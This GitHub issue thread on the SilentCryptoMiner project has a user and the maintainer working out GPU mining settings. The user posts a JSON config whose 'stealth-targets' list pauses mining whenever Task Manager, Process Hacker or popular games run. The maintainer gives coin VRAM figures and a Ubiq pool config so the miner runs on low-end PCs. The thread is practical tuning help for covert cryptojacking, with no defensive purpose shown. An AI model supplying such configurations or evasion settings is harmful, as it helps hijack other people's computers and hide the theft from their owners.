### ISSUE TITLE
Which Best Coin i Mine with GPU

### ISSUE THREAD

**Issue by tarekxxx** [UnamSanctam/SilentCryptoMiner#1290]
Which Best Coin i Mine with GPU from vram lowest to can mange any pc low end or medium end user 
i Mean lowest vram in GPU RVN or which coin is lowest VRAm 

and way configure it 

like this on ETC 

{
	"url": "stratums://walletXMR:ETC~etchash@gulf.moneroocean.stream:443",
	"algo": "etchash",
	"max-gpu": 50,
	"idle-wait": 1,
	"idle-gpu": 90,
	"stealth-targets": 	"Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe,ModernWarfare.exe,ShooterGame.exe,ShooterGameServer.exe,ShooterGame_BE.exe,GenshinImpact.exe,FactoryGame.exe,Borderlands2.exe,EliteDangerous64.exe,PlanetCoaster.exe,Warframe.x64.exe,NMS.exe,RainbowSix.exe,RainbowSix_BE.exe,CK2game.exe,ck3.exe,stellaris.exe,arma3.exe,arma3_x64.exe,TslGame.exe,ffxiv.exe,ffxiv_dx11.exe,GTA5.exe,FortniteClient-Win64-Shipping.exe,r5apex.exe,VALORANT.exe,csgo.exe,PortalWars-Win64-Shipping.exe,FiveM.exe,left4dead2.exe,FIFA21.exe,BlackOpsColdWar.exe,EscapeFromTarkov.exe,TEKKEN 7.exe,SRTTR.exe,DeadByDaylight-Win64-Shipping.exe,PointBlank.exe,enlisted.exe,WorldOfTanks.exe,SoTGame.exe,FiveM_b2189_GTAProcess.exe,NarakaBladepoint.exe,re8.exe,Sonic Colors - Ultimate.exe,iw6sp64_ship.exe,RocketLeague.exe,Cyberpunk2077.exe,FiveM_GTAProcess.exe,RustClient.exe,Photoshop.exe,VideoEditorPlus.exe,AfterFX.exe,League of Legends.exe,Falluot4.exe,FarCry5.exe,RDR2.exe,Little_Nightmares_II_Enhanced-Win64-Shipping.exe,NBA2K22.exe,Borderlands3.exe,LeagueClientUx.exe,RogueCompany.exe,Tiger-Win64-Shipping.exe,WatchDogsLegion.exe,Phasmophobia.exe,VRChat.exe,NBA2K21.exe,NarakaBladepoint.exe,ForzaHorizon4.exe,acad.exe,bf4.exe,zula.exe,Adobe Premiere Pro.exe,GenshinImpact.exe,LeagueClient.exe",
	"kill-targets": "",
	"stealth-fullscreen": true,
	"api-endpoint": "Endpoint.php"
}

**Comment by tarekxxx** [comment]
how change to lowest VRam GPU Mining  Unam ?

**Comment by UnamSanctam** [comment]
No you use xmrig to mine RVN, so you can't change to RVN in the ETH/ETC miner. But RVN uses more VRAM than ETC.
You can find a list here: https://minerstat.com/dag-size-calculator
Generally people miner ETC, UBQ or RVN. These are the VRAM they use:
RVN: 3.7GB
ETC: 3.15GB
UBQ: 1.8GB

**Comment by tarekxxx** [comment]
so how i can use UBQ in COnfigure Json  ?

**Comment by UnamSanctam** [comment]
Change to a UBQ pool, UQB wallet and then just change `algo` to `ubqhash`

**Comment by tarekxxx** [comment]
can you please suggest for me UBQ pool and UBQ Configuration as json because seems not working and setting looks wrong there

**Comment by tarekxxx** [comment]
Sorry For Disturbing you Unam

**Comment by UnamSanctam** [comment]
You can try picopool, it's nanopools "experimental" pool:
```
{
"url": "stratums://wallet@ubiq-eu1.picopool.org:8443",
"algo": "ubqhash"
}

```
Then if you want to add other settings like `max-gpu` then you can just add those.

**Comment by tarekxxx** [comment]
Amazing like Always Bro
